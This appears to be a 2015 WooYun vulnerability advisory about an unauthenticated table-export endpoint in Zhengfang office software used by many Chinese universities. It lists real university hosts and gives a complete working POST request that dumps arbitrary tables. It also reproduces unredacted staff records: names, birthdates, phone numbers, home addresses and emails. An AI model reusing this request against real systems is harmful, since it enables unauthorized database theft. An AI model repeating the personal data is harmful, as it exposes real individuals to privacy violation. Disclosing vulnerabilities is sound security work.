当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101026

漏洞标题:正方某通用系统高危漏洞,影响众多高校

相关厂商:正方软件

漏洞作者: 路人甲

提交时间:2015-03-13 10:39

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

高危漏洞

详细说明:

部分案例
http://oa.tjtc.edu.cn/zfoa/main.action
http://58.49.91.221/zfoa/index.do
http://oa.xynun.edu.cn/zfoa/index.do
http://oa.zbnc.edu.cn/zfoa/index.do
http://58.49.91.221/zfoa/index.do
http://58.42.245.178/zfoa/index.do
http://222.17.128.11:8065/zfoa/index.do
http://220.201.218.10:8018
http://oa.nepu.edu.cn
http://218.197.8.19:8018
协同办公系统
按表名导出数据库任意表,SQL注入都不用找了。。。
导出联系人为例(用户表我就没去找了):
问题文件:/zfoa/dataExport.do?xmlike=&bmlike=
post参数:theAction=save&parameter.delId=&realTable=jsgrxx&tableName=jsgrxx&pageno=&preCurrentPage=1&cookiesName=jsgrxx_list&ycSearch=
表名即realTable和tableName
bmdm:短信发送表
jsgrxx:联系人表
yhzb:用户表
gwxxb:涉密发文表
swxxb:涉密公文收文表
clxxb:车辆申请表
cpjb:呈批件表
xnbgb:校内报告
students,xydmb,yhzb等表。。。。

漏洞证明:

POST http://218.197.8.19:8018/zfoa/dataExport.do?xmlike=&bmlike= HTTP/1.1
Host: 218.197.8.19:8018
Connection: keep-alive
Content-Length: 124
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://218.197.8.19:8018
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://218.197.8.19:8018/zfoa/jsgrxx.do?theAction=list
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=2AFFF9F20040BF2EDEB46D228BAB0F7C; zfsoft_zfoa_currentPage=jsgrxx_list%7E1; style=
theAction=save&parameter.delId=&realTable=jsgrxx&tableName=jsgrxx&pageno=&preCurrentPage=1&cookiesName=jsgrxx_list&ycSearch=
用户ID 姓名 性别 生日 电子邮箱 移动电话 短号 家庭电话 家庭传真 单位电话 办公室内线 部门名称 部门职务 办公地址 地址 邮寄地址 邮政编码 个人主页 传真电话
000002 李维利 男 19531220 1 机电工程与自动化学院 1
000005 单凤兰 女 19591119 13820890656 图书馆 天津河东区卫国道恋日风景小区林语居6-3-201
000006 张莉 女 19650721 生物与环境工程学院
000007 许月 女 19610803 13682196118 印刷工程系 天津市红桥区芥园道明华里17-2-1103
000012 王钢 男 19550610 社会科学部
000013 曲孟蕃 男 19560126 13516259589 图书馆 天津市和平区山西路8号
000014 于成华 女 19630112 图书馆
000015 邓恩远 男 1955-04-01 [email protected] 13820279658 社会管理系
000018 王丽华 女 19631101 社会科学部
000024 陈广诚 男 19690220 [email protected] 13820182212 60585860 印刷工程系 天津芥园道水郡花园1-2-501 300410
000025 陈旭东 男 19671230 后勤管理处
000026 王海霞 女 19710909 经济与管理学院
000027 刘书琴 女 19590102 图书馆
000028 刘文轩 男 19550208 保卫处
000031 顾永华 男 19561025 13803062736 工会 天津市河东区新广路汇和家园1-2-502
000032 刘丽梅 女 19600903 15802272926 印刷工程系 河北区金伟路金辉家园3-9-402
000036 刘全刚 男 19590519 13820777859 5961 60585961 社会管理系 五教406 红桥区北岸潞园3-3-402
000039 陆洪 女 19630907 13682199191 社会管理系 天津职业大学教师公寓2号楼1门101
000040 张容 女 19711127 机电工程与自动化学院
000044 崔海虹 女 1962-10-01 [email protected] 13920404402 5059 60585059 工会 食堂四楼401 河东区卫国道上杭花园2-1-101
000045 宋文英 女 19610421 [email protected] 15522330300 教务处 天津市河北区真理道秀山花园6-4-201
000046 胡永明 男 19590731 图书馆
000047 曲宝平 女 19581227 办公室
000048 郝强 男 19710102 教务处
000050 彭芮 女 19601021 [email protected] 13002210332 60586045 职业技能鉴定第28所 综合学训楼325
000051 朱建华 女 19600101 [email protected] 13820695001 学工部 天津市河北区曙光路圣贤里7-32-403(408-412)
000052 刘德春 男 19590225 保卫处
000053 王虹 女 19580128 基础课教学部
000055 贾立琪 男 19580625 13920856275 财务处 南开大学西南村22号楼1门201
000056 侯铁柱 男 19551108 财务处
000058 只建秀 女 19590804 13820217104 财务处 天津职业大学教师公寓

修复方案:

限制权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝